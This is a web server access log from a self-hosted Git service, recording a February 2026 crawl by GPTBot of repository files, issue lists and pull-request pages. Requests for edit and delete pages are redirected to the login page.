303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 11054] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:35:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:17:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 12503] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:35:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:35:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 9847] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9804] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 11769] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 709] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:17:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:17:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:35:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:17:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10963685] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:17:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:36:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:36:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" +[17/Feb/2026:17:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:17:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 323010] [Gzip 27.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14682] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 12001] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:36:09 +0000] - 200 